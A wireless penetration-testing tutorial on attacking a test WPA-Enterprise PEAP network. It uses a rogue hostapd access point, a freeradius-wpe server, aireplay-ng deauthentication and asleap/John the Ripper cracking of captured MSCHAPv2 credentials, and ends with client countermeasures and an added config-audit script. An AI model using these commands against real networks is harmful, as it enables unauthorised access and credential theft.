By Tony Lee
Introduction
In our previous articles we used TP-Link’s TL-WN722N and a Kali Virtual Machine (VM) to perform wireless discovery and attack against a Wired Equivalent Privacy (WEP) network, WPA (Pre-Shared Key) PSK network, a network hiding its SSID, a MAC filtering network, and our first round of WPA-Enterprise networks (LEAP and EAP-MD5) to showcase the abilities of this inexpensive and flexible setup.
In this article we will complete our tests by attacking a test WPA-Enterprise network that uses Protected EAP (PEAP).
Figure 1: Our setup
Consult our previous WEP article for the following topics, which are omitted from this article due to similarity:
Outline
Preparation
WPA-Enterprise Refresher
Discovery
Attack
PEAP and EAP-TLS Explained
Install the Software
freeradius-server-2.1.12
freeradius-wpe patch
hostapd v2.0
Start the RADIUS Server
Start the Fake AP
Deauthenticate the Client
Brute-force the Credentials
Connect
Countermeasures
Conclusion
Preparation
NetworkManager (included in the default Kali Linux) can cause problems when trying to complete simple tasks such as connecting to wireless networks. To prevent any interference, we will disable it ahead of time.
root@kali:~# service network-manager stop
[ ok ] Stopping network connection manager: NetworkManager.
WPA-Enterprise Refresher
We already looked at breaking WEP and WPA-PSK networks in previous articles and mentioned that the danger in using these wireless standards is that there is a shared static key that should be changed every time someone with knowledge of the key leaves the company. After all, you wouldn’t want an ex-employee still being able to connect to the network after their departure--would you? This is a security issue in any company that has regular turnover. So what is the alternative? WPA-Enterprise of course!
WPA-Enterprise is ideal for large organizations because it does not use a single shared key in which all users use to connect to the wireless network. Each user has their own account (usually username and password) that they use to authenticate to the network. Best of all these accounts can be centrally authenticated and managed--even linked into existing account repositories such as Active Directory or LDAP. When an employee leaves the company and their account is terminated in Active Directory, it would also be terminated from the wireless if authentication is passed through.
The other unique WPA-Enterprise attribute is its use of Extensible Authentication Protocols (EAPs). This allows multiple implementations and increased flexibility for corporations. This flexibility is a double-edged sword though, as not all EAP types are created equal (in terms of security or ease of deployment). We discussed LEAP and EAP-MD5 in the previous article. The EAP types we will discuss in this article are bolded below (feel free to skip the non-bolded ones, as they are listed for completeness):
Discovery (kismet)
In previous articles, we used iwlist, airodump-ng, and Kismet to discover wireless networks. This is also the case here. Take a look below at the information that iwlist provides.
root@kali:~# iwlist wlan1 scanning | grep -A 30 CorpNetwork
ESSID:"CorpNetwork"
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
Mode:Master
Extra:tsf=000000000d674180
Extra: Last beacon: 96ms ago
IE: Unknown: 000B436F72704E6574776F726B
IE: Unknown: 010482840B16
IE: Unknown: 030101
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : 802.1x
--snip--
Even though these three tools can identify WPA-Enterprise networks, none of them can tell you the EAP type. For this we use Wireshark to inspect the packets. Let’s capture some traffic with airodump-ng and inspect it with Wireshark, but first we want to place the wireless card into “Monitor” mode.
root@kali:~# airmon-ng start wlan0
We first use airodump-ng without any options in order to discover the network we want to examine and its details. After we obtain this information, we focus our collection efforts by locking onto the channel and AP.
Syntax:
airodump-ng -c <CHANNEL> --bssid <APMAC> -w <FILE PREFIX> <INT>
Key:
-c = Channel that the AP is on
--bssid = MAC address of the AP
-w = Prefix of the file name that you want to write data to
<INT> = Interface we will be capturing on
Attack:
airodump-ng --bssid A0:F3:C1:0C:B6:46 -c 1 -w mysteryEAP mon0
Figure 2: airodump-ng is detecting wireless networks
From this screenshot, we will note a few items for the attack later:
Variable name = Description: Value
==============================
$ESSID = ESSID: CorpNetwork
$CH = Channel: 1
$AP = AP MAC: A0:F3:C1:0C:B6:46
$VM = Victim user MAC: 24:77:03:8C:D3:44
Now that our capture is running, we can inspect the packets with Wireshark. In order to discover the EAP type, we can use Wireshark’s “Statistics -> Protocol Hierarchy” feature. Look for 802.1X Authentication and apply a filter to those selected packets. A shortcut would be to type “eapol” in the display filters.
Figure 3: Wireshark Protocol Hierarchy feature
After applying the filters, we see that the EAP type is Protected EAP (PEAP).
Figure 4: EAP type is PEAP
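As an added example (not part of the original article), the Python below does by hand what the discovery phase relied on tools for: it decodes the three "IE: Unknown" entries from the iwlist output above (SSID, supported rates, channel) and reads the EAP method type out of an 802.1X EAP-Request, which is what Wireshark's protocol hierarchy revealed in Figure 4. The EAPOL frame it parses is constructed here, not captured from the test network.

```python
# Added example: decode 802.11 information elements as iwlist prints them and
# identify the EAP method carried in an 802.1X (EAPOL) EAP-Packet.
import struct

# 802.11 information element IDs that appeared in the iwlist output
IE_SSID, IE_RATES, IE_DS_PARAMS = 0, 1, 3

# EAP method type codes (IANA EAP registry; RFC 3748 defines the framing)
EAP_TYPES = {1: "Identity", 4: "EAP-MD5", 13: "EAP-TLS", 17: "LEAP",
             21: "EAP-TTLS", 25: "PEAP", 26: "EAP-MSCHAPv2"}


def decode_ie(hex_ie):
    """Decode one raw IE (element id, length, payload) given as hex, the
    way iwlist shows it on an 'IE: Unknown:' line."""
    raw = bytes.fromhex(hex_ie)
    eid, length = raw[0], raw[1]
    body = raw[2:2 + length]
    if len(body) != length:
        raise ValueError("truncated IE")
    if eid == IE_SSID:
        return "SSID", body.decode("ascii", "replace")
    if eid == IE_RATES:
        # bit 7 flags a basic rate ('*'); the low 7 bits are the rate in 500 kbit/s units
        rates = [f"{(b & 0x7F) / 2:g} Mb/s" + ("*" if b & 0x80 else "") for b in body]
        return "Supported rates", rates
    if eid == IE_DS_PARAMS:
        return "Channel", body[0]
    return f"IE {eid}", body.hex()


def eap_method_from_eapol(frame):
    """Return the EAP method name in an EAPOL frame that starts at the 802.1X
    header (version, packet type, body length); None if no method is present."""
    _version, pkt_type, _body_len = struct.unpack("!BBH", frame[:4])
    if pkt_type != 0:          # 0 = EAP-Packet; 3 = EAPOL-Key (4-way handshake) etc.
        return None
    code, _ident, eap_len = struct.unpack("!BBH", frame[4:8])
    if code not in (1, 2) or eap_len < 5:   # only Request/Response carry a type byte
        return None
    return EAP_TYPES.get(frame[8], f"unknown type {frame[8]}")


# Constructed sample: EAPOL v2 EAP-Packet wrapping EAP-Request id 2, type 25 (PEAP),
# flags 0x20 (PEAP start) -- the first thing a PEAP server sends after Identity.
SAMPLE_PEAP_START = bytes.fromhex("02000006" "01020006" "19" "20")
```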
Attack
Now that discovery is complete and we understand the EAP type, we will examine the attack methodology for PEAP and EAP-TLS.
PEAP and EAP-TLS Explained
Since PEAP and EAP-TLS use a secure tunnel to pass the inner authentication protocol, we will need to create a fake RADIUS server and fake access point and convince the client to connect to our infrastructure. This will be accomplished by having a stronger signal than their access point and then deauthenticating the client so they connect to our AP.
The diagrams below help to illustrate the attack process. In the first image, we see normal operation of a client connected to the access point and the access point passing the authentication on to the RADIUS server.
Figure 5: Normal operation in which client is connected to legitimate network
In the second image, we see a deauth attack followed by the client connecting to the fake access point and an attempt to authenticate to the attacker's RADIUS server.
Figure 6: After wireless client is deauthenticated, the client will hopefully connect to our fake access point
This should yield the information necessary to begin a brute-force attack on the credentials. Let’s look at the detailed steps required to get this set up in our environment:
Install the Software
This attack requires a decent amount of software that is not installed by default on the Kali Linux attack image. The software we need is:
We have greatly simplified the download and install of the RADIUS attack service by listing the commands needed below. The freeradius-server-2.1.12 and the patch can be downloaded and applied by copying and pasting the following commands into a terminal as root:
wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2
wget https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch
tar -jxvf freeradius-server-2.1.12.tar.bz2
cd freeradius-server-2.1.12
patch -p1 < ../freeradius-wpe.patch
./configure
make
make install
ldconfig
Explanation of the commands above:
The first two wget statements download both the freeradius server and the patch for wpe. The next line decompresses the freeradius-server package. Then we change directories into the decompressed directory and run the patch. Then we compile and install the application.
After running the commands above, test the freeradius server to make sure the patch was applied by running it with the (-v) version option. You should see “FreeRADIUS-WPE” in the banner.
root@kali:~/freeradius-server-2.1.12# radiusd -v
radiusd: FreeRADIUS-WPE Version 2.1.12, for host i686-pc-linux-gnu, built on Jul 29 2013 at 10:34:02
--snip--
The version of hostapd that Kali has in its repositories is 1.X--which has a limitation of only being able to negotiate WPA1. If we want to be able to attack WPA2 networks, we need to install hostapd v2.0 from source. We have simplified the installation and troubleshooting of the hostapd service by listing the commands below for your copy and paste pleasure:
wget http://hostap.epitest.fi/releases/hostapd-2.0.tar.gz
tar -zxvf hostapd-2.0.tar.gz
cd hostapd-2.0/
cd hostapd/
cp defconfig .config
apt-get install libnl-dev
apt-get update
apt-get install libssl-dev
make && make install
Explanation of the commands above:
The first command obtains the latest source code for hostapd. The next three commands decompress the package and navigate to the proper directory for compilation. We then create a configuration file for compiling. The next three commands grab necessary libraries and finally the last command compiles and installs the binaries.
After all the software is installed, we can start the attack.
Start the RADIUS Server
We can attempt to start the RADIUS server and perform the attack, but there is one configuration change that we needed to make in order to successfully capture credentials from a Windows client using AD pass through authentication.
The file we needed to edit is:
/usr/local/etc/raddb/modules/mschap
We had to make sure the line “with_ntdomain_hack” was set to yes and uncommented as shown below:
# Windows sends us a username in the form of
# DOMAIN\user, but sends the challenge response
# based on only the user portion. This hack
# corrects for that incorrect behavior.
#
with_ntdomain_hack = yes
When that line was commented out, we received the following error message: “Could not recover last 2 bytes of hash from the challenge/response.”
Figure 7: Error message when “with_ntdomain_hack” was not set to yes
Now that we have the configuration file modified, we should be ready to start radiusd.
Syntax:
radiusd -X
Key:
-X = Debugging mode. When trying to understand how the server works, ALWAYS run it with "radiusd -X".
The screenshot below shows the expected behavior of running “radiusd -X”. The configuration will flash by and then the screen will hang until there is input from the fake access point that we set up in the next step.
Figure 8: radiusd is ready to process requests
Start the Fake AP
If we want to trick the victim into connecting to our setup, we need a fake access point. This can be a hardware based access point, such as the Netgear home router we have been using in the previous articles, or we can create a software access point. Because a software access point is more flexible and portable, we will use the hostapd software AP in this article. The hostapd software requires a configuration file. Feel free to use our example file below to get you started:
interface=wlan0
driver=nl80211
ssid=CorpNetwork
logger_stdout=-1
logger_stdout_level=0
dump_file=/tmp/hostapd.dump
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
wpa=2
wpa_key_mgmt=WPA-EAP
channel=1
wpa_pairwise=TKIP CCMP
After you have entered the data above in a file called hostapd.conf, run the software and supply the configuration file as shown below:
Syntax:
hostapd <configuration file>
Attack:
hostapd ./hostapd.conf
After running hostapd, your screen should look like the following screenshot:
Figure 9: hostapd will display minimal output after it is ready to receive the first wireless client
Deauthenticate the Client
Now that we have our RADIUS server and fake access point ready to go, we need a client to authenticate to us. We could be patient and wait for any client to connect or reconnect to our AP, or we could help speed the process up. Our goal here is to deauthenticate (aka kick a client off the network) so they reconnect to the network. Upon client reauthentication, we will trick them into connecting to our fake access point and RADIUS server so they will create the encrypted tunnel with us and pass their inner authentication credentials.
In our example, the victim information found during the discovery phase is summarized below:
Variable name = Description: Value
==============================
$ESSID = ESSID: CorpNetwork
$CH = Channel: 1
$AP = AP MAC: A0:F3:C1:0C:B6:46
$VM = Victim user MAC: 24:77:03:8C:D3:44
Now, let’s knock the victim off the wireless network using aireplay’s deauthentication attack.
Syntax:
aireplay-ng -0 25 -a <AP> -c <VICTIM_MAC> <INT>
Key:
-0 = (same as --deauth) deauthentication attack
-a = MAC address of the AP
-c = Victim MAC address
<INT> = Interface we will be attacking from
Attack:
aireplay-ng -0 25 -a $AP -c $VM mon0
If the client reconnects to your access point, you will see traffic on both the freeradius-wpe screen as well as the hostapd screen. However, the real goods will be displayed in the freeradius-server-wpe.log file:
root@kali:~# tail -f /usr/local/var/log/radius/freeradius-server-wpe.log
The client authentication will fail, but this still provides us with the MSCHAPv2 challenge/response we need to crack the user’s password shown in the next section.
Figure 10: The user’s authentication will fail, but we will have the challenge/response needed to crack the password
Brute-force the Credentials
Since the attack on these WPA-Enterprise inner authentication protocols is an off-line brute-force attack, you will first need a sufficiently large wordlist to supply to the cracking program. The rockyou.com word list is a good start as it is almost 14.5 million passwords. In order to use the rockyou.com wordlist, you will have to uncompress it as shown below:
root@kali:/usr/share/wordlists# ls
rockyou.txt.gz
root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz
root@kali:/usr/share/wordlists# ls
rockyou.txt
root@kali:/usr/share/wordlists# wc -l rockyou.txt
14344392 rockyou.txt
MSCHAPv2
Since the inner authentication protocol was MSCHAPv2 in this example, we will use Josh Wright’s asleap tool as shown below. We will supply the challenge (-C), response (-R), and the wordlist (-W):
Syntax:
root@kali:~# asleap
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
asleap: Must supply an interface with -i, or a stored file with -r
Usage: asleap [options]
-r Read from a libpcap file
-i Interface to capture on
-f Dictionary file with NT hashes
-n Index file for NT hashes
-s Skip the check to make sure authentication was successful
-h Output this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit
-C Challenge value in colon-delimited bytes
-R Response value in colon-delimited bytes
-W ASCII dictionary file (special purpose)
Attack:
root@kali:~# asleap -C 9f:55:58:f3:27:72:12:4e -R 79:bc:55:2e:ef:0d:33:1e:ca:5f:75:93:0d:9e:14:e3:6d:78:9b:f5:61:0a:b8:7b -W /usr/share/wordlists/rockyou.txt
The asleap tool is very fast. It found our password of “cheekymonkeyrox” in just seconds because it is present as-is within the rockyou password list.
Figure 11: The challenge/response is used in the asleap tool with a dictionary to recover the password
Keep in mind that passwords are case sensitive and would thus most likely require permutations of passwords as discussed in previous articles. For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger:
Generate permutations with JTR:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout
Feed JTR permutations into asleap:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -W - -C <CHALLENGE> -R <RESPONSE>
Example:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -C 9f:55:58:f3:27:72:12:4e -R 79:bc:55:2e:ef:0d:33:1e:ca:5f:75:93:0d:9e:14:e3:6d:78:9b:f5:61:0a:b8:7b -W -
EAP-MD5
If the inner authentication protocol is EAP-MD5, use the eapmd5pass tool:
Syntax:
root@kali:~# eapmd5pass
eapmd5pass - Dictionary attack against EAP-MD5
Usage: eapmd5pass [ -i <int> | -r <pcapfile> ] [ -w wordfile ] [options]
-i <iface> interface name
-r <pcapfile> read from a named libpcap file
-w <wordfile> use wordfile for possible passwords.
-b <bssid> BSSID of target network (default: all)
-U <username> Username of EAP-MD5 user.
-C <chal> EAP-MD5 challenge value.
-R <response> EAP-MD5 response value.
-E <eapid> EAP-MD5 response EAP ID value.
-v increase verbosity level (max 3)
-V version information
-h usage information
The "-r" and "[-U|-C|-R|-E]" options are not meant to be used together. Use -r when a packet capture is available. Specify the username, challenge and response when available through other means.
Attack:
root@kali:~# eapmd5pass -w /usr/share/wordlists/rockyou.txt -r WPAcapture-01.cap
For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger:
Generate permutations with JTR:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout
Feed JTR permutations into eapmd5pass:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r <PCAP>
Example:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r WPAcapture-01.cap
Connect
Now that we have recovered the credentials, we will connect to the AP using the configuration files below:
Check the status of the card:
root@kali:~# iwconfig wlan0
Enter the network information:
root@kali:~# iwconfig wlan0 essid "CorpNetwork"
Bring the Interface up:
root@kali:~# ifconfig wlan0 up
Create wpa_supplicant file:
network={
ssid="CorpNetwork"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="TonyTestUser"
password="cheekymonkeyrox"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
Run the wpa_supplicant:
root@kali:~# wpa_supplicant -i wlan0 -c ~/wpa-psk.conf
Obtain an IP:
root@kali:~# dhclient wlan0
Reloading /etc/samba/smb.conf: smbd only.
Verify an IP is obtained:
root@kali:~# ifconfig wlan0
Countermeasures
Even though the intention of this article is not to warn about the dangers of using WPA-Enterprise PEAP or EAP-TLS security, we feel that it is important to note that client settings can be just as important as the EAP type. That said, we perform many wireless assessments in which we discover misconfigured clients that leave themselves open to the attack outlined in this article. When this is the case, we recommend centrally reconfiguring the wireless clients to reflect a more secure configuration. For example, PEAP properties should always validate server certificates, specify RADIUS servers, specify CAs, and prevent users from overriding any suspicious events. These secure client settings are shown in the screenshot below.
Figure 12: Wireless client settings for PEAP
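The screenshot shows the Windows settings; as an added example (not from the article), the Python below applies the same checks to wpa_supplicant network blocks, which is the client configuration format the Connect section used. It assumes the wpa_supplicant keys ca_cert (pin the issuing CA) and domain_suffix_match/altsubject_match/subject_match (restrict which RADIUS server certificates are accepted) as the equivalents of "validate server certificate", "specify CAs" and "specify RADIUS servers"; the two configs are constructed, and the CA path and server name in the hardened one are placeholders.

```python
# Added example: flag PEAP/TTLS/TLS client blocks in a wpa_supplicant.conf that
# would accept a rogue RADIUS server, i.e. the client-side weakness this attack needs.
import re

TUNNELED_EAP = {"PEAP", "TTLS", "TLS"}
SERVER_NAME_KEYS = ("domain_suffix_match", "altsubject_match", "subject_match")


def parse_networks(conf_text):
    """Return one dict per network={...} block, mapping key -> unquoted value.
    Whole-line and trailing '#' comments are dropped (values containing '#' are
    not expected in these fields)."""
    networks = []
    for block in re.findall(r"network=\{(.*?)\}", conf_text, re.S):
        entry = {}
        for line in block.splitlines():
            line = line.split("#", 1)[0].strip()
            if "=" in line:
                key, value = line.split("=", 1)
                entry[key.strip()] = value.strip().strip('"')
        networks.append(entry)
    return networks


def audit_peap_client(network):
    """Return a list of findings for one network block; an empty list means the
    block validates the server certificate and restricts the accepted server."""
    findings = []
    if network.get("key_mgmt") != "WPA-EAP" or network.get("eap") not in TUNNELED_EAP:
        return findings          # not a tunneled WPA-Enterprise profile; nothing to check
    if not network.get("ca_cert"):
        findings.append("no ca_cert: server certificate is not validated against a pinned CA")
    if not any(network.get(k) for k in SERVER_NAME_KEYS):
        findings.append("no server name match: any certificate chaining to the CA is accepted")
    return findings


def audit_conf(conf_text):
    """Map each SSID in the file to its findings."""
    return {n.get("ssid", "?"): audit_peap_client(n) for n in parse_networks(conf_text)}


# Constructed: the first block mirrors the article's connect-phase profile (no server
# validation, which is exactly what a fake RADIUS server relies on); the second pins
# the CA and the expected RADIUS server name (placeholder values).
WEAK_CONF = '''
network={
    ssid="CorpNetwork"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="TonyTestUser"
    password="example-only"
    phase2="auth=MSCHAPV2"
}
'''
HARDENED_CONF = WEAK_CONF.replace('    phase2=', '''    # placeholder CA path and RADIUS server name, not from the article
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
    phase2=''')
```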
Conclusion
In this article, we proved the capabilities of an inexpensive wireless adapter and a flexible virtualized wireless attack image by breaking into a WPA-Enterprise PEAP test network. For just $16, and with no reboot required, you can place a wireless adapter into monitor mode and start assessing wireless networks. More testing needs to be done with this setup to determine other capabilities; however, as of right now, it appears that it can provide quick, portable, flexible, and inexpensive wireless testing. Feedback below is always appreciated.
Props
Thomas d'Otreppe for the ever critical aircrack-ng software suite
Josh Wright and Brad Antoniewicz for great work on freeradius-WPE
Josh Wright for asleap and eapmd5pass
Jouni Malinen <j@w1.fi> and contributors for hostapd
Offensive security group for Kali Linux
Dan Dumond for the sanity check and proof read